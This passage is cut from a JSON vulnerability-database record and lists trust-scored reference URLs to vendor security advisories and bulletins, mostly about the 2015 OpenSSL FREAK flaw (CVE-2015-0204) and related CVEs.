            "url": "http://marc.info/?l=bugtraq\u0026m=142720981827617\u0026w=2"
          },
          {
            "trust": 1.1,
            "url": "http://marc.info/?l=bugtraq\u0026m=142721102728110\u0026w=2"
          },
          {
            "trust": 1.1,
            "url": "http://lists.opensuse.org/opensuse-security-announce/2015-03/msg00027.html"
          },
          {
            "trust": 1.1,
            "url": "http://www.mandriva.com/security/advisories?name=mdvsa-2015:063"
          },
          {
            "trust": 1.1,
            "url": "http://www.mandriva.com/security/advisories?name=mdvsa-2015:062"
          },
          {
            "trust": 1.1,
            "url": "http://lists.apple.com/archives/security-announce/2015/apr/msg00001.html"
          },
          {
            "trust": 1.1,
            "url": "https://support.apple.com/ht204659"
          },
          {
            "trust": 1.1,
            "url": "http://lists.opensuse.org/opensuse-security-announce/2015-05/msg00026.html"
          },
          {
            "trust": 1.1,
            "url": "http://www.oracle.com/technetwork/topics/security/cpujul2015-2367936.html"
          },
          {
            "trust": 1.1,
            "url": "http://www.oracle.com/technetwork/topics/security/cpuoct2015-2367953.html"
          },
          {
            "trust": 1.1,
            "url": "http://www.securityfocus.com/bid/91787"
          },
          {
            "trust": 1.1,
            "url": "http://marc.info/?l=bugtraq\u0026m=144050297101809\u0026w=2"
          },
          {
            "trust": 1.1,
            "url": "http://marc.info/?l=bugtraq\u0026m=144050254401665\u0026w=2"
          },
          {
            "trust": 1.1,
            "url": "http://marc.info/?l=bugtraq\u0026m=143213830203296\u0026w=2"
          },
          {
            "trust": 1.1,
            "url": "http://marc.info/?l=bugtraq\u0026m=143748090628601\u0026w=2"
          },
          {
            "trust": 1.1,
            "url": "http://marc.info/?l=bugtraq\u0026m=144050155601375\u0026w=2"
          },
          {
            "trust": 1.1,
            "url": "http://marc.info/?l=bugtraq\u0026m=144043644216842\u0026w=2"
          },
          {
            "trust": 1.1,
            "url": "http://marc.info/?l=bugtraq\u0026m=142895206924048\u0026w=2"
          },
          {
            "trust": 1.1,
            "url": "http://marc.info/?l=bugtraq\u0026m=144050205101530\u0026w=2"
          },
          {
            "trust": 1.1,
            "url": "http://marc.info/?l=bugtraq\u0026m=142496179803395\u0026w=2"
          },
          {
            "trust": 1.1,
            "url": "http://www.oracle.com/technetwork/topics/security/bulletinapr2015-2511959.html"
          },
          {
            "trust": 1.1,
            "url": "http://www.oracle.com/technetwork/topics/security/bulletinjan2015-2370101.html"
          },
          {
            "trust": 1.1,
            "url": "https://bto.bluecoat.com/security-advisory/sa88"
          },
          {
            "trust": 1.1,
            "url": "http://lists.opensuse.org/opensuse-security-announce/2016-03/msg00011.html"
          },
          {
            "trust": 1.1,
            "url": "http://lists.opensuse.org/opensuse-security-announce/2015-12/msg00001.html"
          },
          {
            "trust": 1.1,
            "url": "http://lists.opensuse.org/opensuse-security-announce/2015-12/msg00003.html"
          },
          {
            "trust": 1.1,
            "url": "http://lists.opensuse.org/opensuse-security-announce/2015-12/msg00000.html"
          },
          {
            "trust": 1.1,
            "url": "http://lists.opensuse.org/opensuse-security-announce/2015-12/msg00004.html"
          },
          {
            "trust": 1.1,
            "url": "http://lists.opensuse.org/opensuse-security-announce/2015-12/msg00006.html"
          },
          {
            "trust": 1.1,
            "url": "http://lists.opensuse.org/opensuse-security-announce/2016-01/msg00005.html"
          },
          {
            "trust": 1.1,
            "url": "https://bto.bluecoat.com/security-advisory/sa91"
          },
          {
            "trust": 1.1,
            "url": "https://security.gentoo.org/glsa/201503-11"
          },
          {
            "trust": 1.1,
            "url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10679"
          },
          {
            "trust": 1.1,
            "url": "http://www.securitytracker.com/id/1033378"
          },
          {
            "trust": 1.1,
            "url": "https://h20564.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04773241"
          },
          {
            "trust": 1.1,
            "url": "http://www-304.ibm.com/support/docview.wss?uid=swg21960769"
          },
          {
            "trust": 1.1,
            "url": "http://lists.opensuse.org/opensuse-security-announce/2015-06/msg00031.html"
          },
          {
            "trust": 1.1,
            "url": "http://lists.opensuse.org/opensuse-security-announce/2015-06/msg00022.html"
          },
          {
            "trust": 1.1,
            "url": "http://lists.opensuse.org/opensuse-security-announce/2015-06/msg00015.html"
          },
          {
            "trust": 1.1,
            "url": "http://lists.opensuse.org/opensuse-security-announce/2015-06/msg00014.html"
          },
          {
            "trust": 1.1,
            "url": "https://kc.mcafee.com/corporate/index?page=content\u0026id=sb10110"
          },
          {
            "trust": 1.1,
            "url": "https://kc.mcafee.com/corporate/index?page=content\u0026id=sb10108"
          },
          {
            "trust": 1.1,
            "url": "https://kc.mcafee.com/corporate/index?page=content\u0026id=sb10102"
          },
          {
            "trust": 1.1,
            "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/99707"
          },
          {
            "trust": 1.1,
            "url": "http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html"
          },
          {
            "trust": 1.1,
            "url": "http://www.oracle.com/technetwork/security-advisory/cpujul2018-4258247.html"
          },
          {
            "trust": 0.9,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0204"
          },
          {
            "trust": 0.8,
            "url": "http://blog.cryptographyengineering.com/2015/03/attack-of-week-freak-or-factoring-nsa.html"
          },
          {
            "trust": 0.8,
            "url": "http://cwe.mitre.org/data/definitions/757.html"
          },
          {
            "trust": 0.8,
            "url": "http://cwe.mitre.org/data/definitions/326.html"
          },
          {
            "trust": 0.8,
            "url": "https://tools.ietf.org/html/rfc4346#appendix-f.1.1.2"
          },
          {
            "trust": 0.8,
            "url": "https://technet.microsoft.com/library/security/3046015.aspx"
          },
          {
            "trust": 0.8,
            "url": "http://jvn.jp/vu/jvnvu99125992/index.html"
          },
          {
            "trust": 0.8,
            "url": "http://www.kb.cert.org/vuls/id/243585"
          },
          {
            "trust": 0.6,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3570"
          },
          {
            "trust": 0.6,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2014-8275"
          },
          {
            "trust": 0.5,
            "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secbullarchive/"
          },
          {
            "trust": 0.5,
            "url": "http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins"
          },
          {
            "trust": 0.5,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3572"
          },
          {
            "trust": 0.5,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3571"
          },
          {
            "trust": 0.5,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3569"
          },
          {
            "trust": 0.4,
            "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/"
          },
          {
            "trust": 0.4,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0205"
          },
          {
            "trust": 0.4,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0206"
          },
          {
            "trust": 0.3,
            "url": "https://access.redhat.com/security/cve/cve-2015-0204"
          },
          {
            "trust": 0.3,
            "url": "http://www.pexip.com/sites/pexip/files/pexip_security_bulletin_2015-01-30.pdf"
          },
          {
            "trust": 0.3,
            "url": "http://www.splunk.com/view/sp-caaanv8#announce1"
          },
          {
            "trust": 0.3,
            "url": "http://openssl.org/"
          },
          {
            "trust": 0.3,
            "url": "http://www.splunk.com/view/sp-caaanu5#affectedproductsandcomponents"
          },
          {
            "trust": 0.3,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21699883"
          },
          {
            "trust": 0.3,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21699667"
          },
          {
            "trust": 0.3,
            "url": "http://seclists.org/bugtraq/2015/feb/160"
          },
          {
            "trust": 0.3,
            "url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10679\u0026cat=sirt_1\u0026actp=list"
          },
          {
            "trust": 0.3,
            "url": "https://downloads.avaya.com/css/p8/documents/101011689"
          },
          {
            "trust": 0.3,
            "url": "https://h20564.www2.hp.com/hpsc/doc/public/display?docid=emr_na-c04746490"
          },
          {
            "trust": 0.3,
            "url": "https://h20564.www2.hp.com/hpsc/doc/public/display?docid=emr_na-c04602055"
          },
          {
            "trust": 0.3,
            "url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c04773241"
          },
          {
            "trust": 0.3,
            "url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c04765115"
          },
          {
            "trust": 0.3,
            "url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c04765169"
          },
          {
            "trust": 0.3,
            "url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c04774019"
          },
          {
            "trust": 0.3,
            "url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c04774021"
          },
          {
            "trust": 0.3,
            "url": "https://h20564.www2.hp.com/hpsc/doc/public/display?docid=emr_na-c04679334"
          },
          {
            "trust": 0.3,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1022548"
          },
          {
            "trust": 0.3,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1022550"
          },
          {
            "trust": 0.3,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1005334"
          },
          {
            "trust": 0.3,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21902260"
          },
          {
            "trust": 0.3,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21903805"
          },
          {
            "trust": 0.3,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21960151"
          },
          {
            "trust": 0.3,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21960634"
          },
          {
            "trust": 0.3,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21963126"
          },
          {
            "trust": 0.3,
            "url": "http://www.ibm.com/support/docview.wss?uid=swg21963526"
          },
          {
            "trust": 0.3,
            "url": "http://www.ibm.com/support/docview.wss?uid=swg21964496"
          },
          {
            "trust": 0.3,
            "url": "http://www.ibm.com/support/docview.wss?uid=swg21964610"
          },
          {
            "trust": 0.3,
            "url": "http://www.ibm.com/support/docview.wss?uid=swg21964625"
          },
          {
            "trust": 0.3,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21964730"
          },
          {
            "trust": 0.3,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21966177"
          },
          {
            "trust": 0.3,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21698818"
          },
          {
            "trust": 0.3,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21883857"
          },
          {
            "trust": 0.3,
            "url": "https://aix.software.ibm.com/aix/efixes/security/openssl_advisory12.asc"
          },
          {
            "trust": 0.3,
            "url": "http://aix.software.ibm.com/aix/efixes/security/java_april2015_advisory.asc"
          },
          {
            "trust": 0.3,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21960515"
          },
          {
            "trust": 0.3,
            "url": "https://www.xerox.com/download/security/security-bulletin/32cfd-51ec67c0f86df/cert_security_mini-_bulletin_xrx15ah_for_p3600_v1-0.pdf"
          },
          {
            "trust": 0.3,
            "url": "https://www.xerox.com/download/security/security-bulletin/30b1a-51f527aa71c0f/cert_security_mini-_bulletin_xrx15aj_for_wc3550_v1-0.pdf"
          },
          {
            "trust": 0.3,
            "url": "https://www.xerox.com/download/security/security-bulletin/38cb3-51fe2768b1a74/cert_security_mini-_bulletin_xrx15ak_for_p3635mfp_v1-0.pdf"
          },
          {
            "trust": 0.3,
            "url": "https://www.xerox.com/download/security/security-bulletin/3497e-521fff9cafe80/cert_security_mini-_bulletin_xrx15am_for_p30xx_p3260_wc30xx_wc3225_v1-0.pdf"
          },
          {
            "trust": 0.3,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21902444"
          },
          {
            "trust": 0.3,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21902710"
          },
          {
            "trust": 0.3,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21960815"
          },
          {
            "trust": 0.3,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21957999"
          },
          {
            "trust": 0.3,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21959525"
          },
          {
            "trust": 0.3,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21965448"
          },
          {
            "trust": 0.3,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21903747"
          },
          {
            "trust": 0.3,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21964850"
          },
          {
            "trust": 0.3,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21957855"
          },
          {
            "trust": 0.3,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21958902"
          },
          {
            "trust": 0.3,
            "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21959575"
          },
          {
            "trust": 0.3,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21959252"
          },
          {
            "trust": 0.3,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21699271"
          },
          {
            "trust": 0.3,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=nas8n1020751"
          },
          {
            "trust": 0.3,
            "url": "https://downloads.avaya.com/css/p8/documents/101008182"
          },
          {
            "trust": 0.3,
            "url": "https://downloads.avaya.com/css/p8/documents/101011698"
          },
          {
            "trust": 0.3,
            "url": "https://www.openssl.org/news/vulnerabilities.html"
          },
          {
            "trust": 0.3,
            "url": "http://www.oracle.com/technetwork/security-advisory/cpuapr2017-3236618.html"
          },
          {
            "trust": 0.3,
            "url": "https://downloads.avaya.com/css/p8/documents/101011712"
          },
          {
            "trust": 0.3,
            "url": "https://service.sap.com/sap/support/notes/2163306"
          },
          {
            "trust": 0.3,
            "url": "https://www.alienvault.com/forums/discussion/4475/security-advisory-alienvault-v4-15-1-addresses-twenty-20-vulnerabilities"
          },
          {
            "trust": 0.3,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21903636"
          },
          {
            "trust": 0.3,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21963783"
          },
          {
            "trust": 0.3,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1005351"
          },
          {
            "trust": 0.3,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21963964"
          },
          {
            "trust": 0.3,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21903396"
          },
          {
            "trust": 0.3,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21967539"
          },
          {
            "trust": 0.3,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21903541"
          },
          {
            "trust": 0.3,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21903029"
          },
          {
            "trust": 0.3,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21957813"
          },
          {
            "trust": 0.3,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21965485"
          },
          {
            "trust": 0.3,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21964027"
          },
          {
            "trust": 0.3,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21903651"
          },
          {
            "trust": 0.3,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21958017"
          },
          {
            "trust": 0.3,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21903247"
          },
          {
            "trust": 0.3,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21903256"
          },
          {
            "trust": 0.3,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21903516"
          },
          {
            "trust": 0.3,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21965920"
          },
          {
            "trust": 0.3,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21961223"
          },
          {
            "trust": 0.3,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21903031"
          },
          {
            "trust": 0.3,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21965404"
          },
          {
            "trust": 0.3,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21962552"
          },
          {
            "trust": 0.3,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21958919"
          },
          {
            "trust": 0.3,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21958918"
          },
          {
            "trust": 0.3,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21957919"
          },
          {
            "trust": 0.3,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21962838"
          },
          {
            "trust": 0.3,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21962837"
          },
          {
            "trust": 0.3,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21960075"
          },
          {
            "trust": 0.3,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21902765"
          },
          {
            "trust": 0.3,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21902862"
          },
          {
            "trust": 0.3,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21902866"
          },
          {
            "trust": 0.3,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21959306"
          },
          {
            "trust": 0.3,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21903394"
          },
          {
            "trust": 0.3,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21957779"
          },
          {
            "trust": 0.3,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21961493"
          },
          {
            "trust": 0.3,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1005328"
          },
          {
            "trust": 0.3,
            "url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5098593"
          },
          {
            "trust": 0.3,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21964236"
          },
          {
            "trust": 0.3,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21957995"
          },
          {
            "trust": 0.3,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21903299"
          },
          {
            "trust": 0.3,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1005159"
          },
          {
            "trust": 0.3,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21699938"
          },
          {
            "trust": 0.3,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21902635"
          },
          {
            "trust": 0.3,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21700163"
          },
          {
            "trust": 0.3,
            "url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5097912"
          },
          {
            "trust": 0.3,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21902694"
          },
          {
            "trust": 0.3,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21902277"
          },
          {
            "trust": 0.3,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21697291"
          },
          {
            "trust": 0.3,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21699235"
          },
          {
            "trust": 0.3,
            "url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5097796"
          },
          {
            "trust": 0.3,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21700168"
          },
          {
            "trust": 0.3,
            "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21697162"
          },
          {
            "trust": 0.3,
            "url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5097823"
          },
          {
            "trust": 0.3,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21700411"
          },
          {
            "trust": 0.3,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21701354"
          },
          {
            "trust": 0.3,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21700028"
          },
          {
            "trust": 0.3,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1022100"
          },
          {
            "trust": 0.3,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1005158"
          },
          {
            "trust": 0.3,
            "url": "http://www.splunk.com/view/sp-caaanxd"
          },
          {
            "trust": 0.3,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1005370"
          },
          {
            "trust": 0.3,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1009328"
          },
          {
            "trust": 0.3,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21960460"
          },
          {
            "trust": 0.3,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21963609"
          },
          {
            "trust": 0.3,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21965940"
          },
          {
            "trust": 0.3,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21967498"
          },
          {
            "trust": 0.3,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21967709"
          },
          {
            "trust": 0.3,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21967962"
          },
          {
            "trust": 0.3,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21968485"
          },
          {
            "trust": 0.3,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21968869"
          },
          {
            "trust": 0.3,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21695985"
          },
          {
            "trust": 0.3,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1022074"
          },
          {
            "trust": 0.3,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21701453"
          },
          {
            "trust": 0.3,
            "url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5098358"
          },
          {
            "trust": 0.3,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21959002"
          },
          {
            "trust": 0.3,
            "url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5097360"
          },
          {
            "trust": 0.3,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21699052"
          },
          {
            "trust": 0.3,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21699810"
          },
          {
            "trust": 0.3,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21699069"
          },
          {
            "trust": 0.3,
            "url": "https://www.xerox.com/download/security/security-bulletin/2e28e-523433d609b1d/cert_security_mini-_bulletin_xrx15ap_for_wc6400_v1-0.pdf"
          },
          {
            "trust": 0.3,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0288"
          },
          {
            "trust": 0.3,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0287"
          },
          {
            "trust": 0.3,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0289"
          },
          {
            "trust": 0.2,
            "url": "https://access.redhat.com/security/team/contact/"
          },
          {
            "trust": 0.2,
            "url": "https://www.redhat.com/mailman/listinfo/rhsa-announce"
          },
          {
            "trust": 0.2,
            "url": "https://bugzilla.redhat.com/):"
          },
          {
            "trust": 0.2,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0209"
          },
          {
            "trust": 0.2,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0293"
          },
          {
            "trust": 0.2,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0292"
          },
          {
            "trust": 0.2,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0286"
          },
          {
            "trust": 0.1,
            "url": "https://cwe.mitre.org/data/definitions/310.html"
          },
          {
            "trust": 0.1,
            "url": "https://access.redhat.com/errata/rhsa-2015:0066"
          },
          {
            "trust": 0.1,
            "url": "https://github.com/felmoltor/freakvulnchecker"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov"
          },
          {
            "trust": 0.1,
            "url": "http://tools.cisco.com/security/center/viewalert.x?alertid=37722"
          },
          {
            "trust": 0.1,
            "url": "https://usn.ubuntu.com/2459-1/"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2016-5387"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2106"
          },
          {
            "trust": 0.1,
            "url": "https://access.redhat.com/security/updates/classification/#important"
          },
          {
            "trust": 0.1,
            "url": "https://access.redhat.com/security/cve/cve-2016-2106"
          },
          {
            "trust": 0.1,
            "url": "https://access.redhat.com/security/cve/cve-2016-2105"
          },
          {
            "trust": 0.1,
            "url": "https://access.redhat.com/security/cve/cve-2016-3110"
          },
          {
            "trust": 0.1,
            "url": "https://access.redhat.com/site/documentation/en-us/jboss_enterprise_web_server/2/html-single/installation_guide/index.html"
          },
          {
            "trust": 0.1,
            "url": "https://access.redhat.com/security/cve/cve-2016-5387"
          },
          {
            "trust": 0.1,
            "url": "https://access.redhat.com/documentation/en-us/red_hat_jboss_web_server/2.1/html/2.1.1_release_notes/index.html"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2105"
          },
          {
            "trust": 0.1,
            "url": "https://access.redhat.com/security/vulnerabilities/httpoxy"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2016-3110"
          },
          {
            "trust": 0.1,
            "url": "https://access.redhat.com/security/cve/cve-2014-3570"
          },
          {
            "trust": 0.1,
            "url": "https://access.redhat.com/site/documentation/"
          },
          {
            "trust": 0.1,
            "url": "https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?product=webserver\u0026downloadtype=distributions\u0026version=2.1.1"
          },
          {
            "trust": 0.1,
            "url": "https://h20392.www2.hp.com/portal/swdepot/displayproductinfo.do?productnumber"
          },
          {
            "trust": 0.1,
            "url": "https://www.hp.com/go/swa"
          },
          {
            "trust": 0.1,
            "url": "https://h20564.www2.hpe.com/portal/site/hpsc/public/kb/"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5409"
          },
          {
            "trust": 0.1,
            "url": "http://h20566.www2.hpe.com/hpsc/doc/public/display?calledby=search_result\u0026doc"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5412"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5413"
          },
          {
            "trust": 0.1,
            "url": "http://www.hp.com/swpublishing/mtx-20861d704bc04221a1518b7cb6"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5410"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5411"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0235"
          },
          {
            "trust": 0.1,
            "url": "http://ftp.hp.com/pub/tcdebian/updates/4.2/service_packs/security-sp-2.0-all-"
          },
          {
            "trust": 0.1,
            "url": "http://ftp.hp.com/pub/tcdebian/updates/4.3/service_packs/security-sp-2.0-all-"
          },
          {
            "trust": 0.1,
            "url": "http://ftp.hp.com/pub/tcdebian/updates/5.1/service_packs/security-sp-2.1-all-"
          },
          {
            "trust": 0.1,
            "url": "http://ftp.hp.com/pub/tcdebian/updates/4.4/service_packs/security-sp-2.1-all-"
          },
          {
            "trust": 0.1,
            "url": "http://ftp.hp.com/pub/tcdebian/updates/5.0/service_packs/security-sp-2.1-all-"
          },
          {
            "trust": 0.1,
            "url": "http://ftp.hp.com/pub/tcdebian/updates/4.1/service_packs/security-sp-2.0-all-"
          },
          {
            "trust": 0.1,
            "url": "http://ftp.hp.com/pub/softpaq/sp70501-71000/sp70649.exe"
          },
          {
            "trust": 0.1,
            "url": "http://ftp.hp.com/pub/tcdebian/updates/4.4/service_packs/security-sp-2.0-all-"
          },
          {
            "trust": 0.1,
            "url": "https://access.redhat.com/articles/1384453"
          },
          {
            "trust": 0.1,
            "url": "https://access.redhat.com/security/cve/cve-2015-0288"
          },
          {
            "trust": 0.1,
            "url": "https://access.redhat.com/security/cve/cve-2015-0292"
          },
          {
            "trust": 0.1,
            "url": "https://access.redhat.com/security/cve/cve-2014-8275"
          },
          {
            "trust": 0.1,
            "url": "https://access.redhat.com/articles/11258"
          },
          {
            "trust": 0.1,
            "url": "https://access.redhat.com/security/updates/classification/#moderate"
          },
          {
            "trust": 0.1,
            "url": "https://access.redhat.com/security/cve/cve-2015-0293"
          },
          {
            "trust": 0.1,
            "url": "https://access.redhat.com/security/cve/cve-2015-0287"
          },
          {
            "trust": 0.1,
            "url": "https://access.redhat.com/security/cve/cve-2015-0289"
          },
          {
            "trust": 0.1,
            "url": "https://access.redhat.com/security/team/key/"
          },
          {
            "trust": 0.1,
            "url": "https://h20566.www2.hp.com/portal/site/hpsc/patch/home"
          },
          {
            "trust": 0.1,
            "url": "http://h71000.www7.hp.com/openvms/products/ssl/ssl.html"
          },
          {
            "trust": 0.1,
            "url": "https://service.sap.com/sap/support/notes/2057982\u003e."
          },
          {
            "trust": 0.1,
            "url": "https://service.sap.com/sap/support/notes/2159601\u003e."
          },
          {
            "trust": 0.1,
            "url": "https://www.linkedin.com/company/2217474?trk=ppro_cprof\u003e"
          },
          {
            "trust": 0.1,
            "url": "http://erpscan.com\u003e"
          },
          {
            "trust": 0.1,
            "url": "http://scn.sap.com/docs/doc-8218\u003e."
          },
          {
            "trust": 0.1,
            "url": "https://service.sap.com/sap/support/notes/2129609\u003e:"
          },
          {
            "trust": 0.1,
            "url": "https://freakattack.com/\u003e"
          },
          {
            "trust": 0.1,
            "url": "https://twitter.com/erpscan\u003e"
          },
          {
            "trust": 0.1,
            "url": "http://www.erpscan.com/\u003eresearchers."
          },
          {
            "trust": 0.1,
            "url": "https://service.sap.com/sap/support/notes/2151237\u003e:"
          },
          {
            "trust": 0.1,
            "url": "https://service.sap.com/sap/support/notes/2163306\u003e:"
          },
          {
            "trust": 0.1,
            "url": "http://www.sap.com/\u003ehas"
          },
          {
            "trust": 0.1,
            "url": "https://service.sap.com/sap/support/notes/1997734\u003e:"
          },
          {
            "trust": 0.1,
            "url": "http://erpscan.com/\u003e"
          },
          {
            "trust": 0.1,
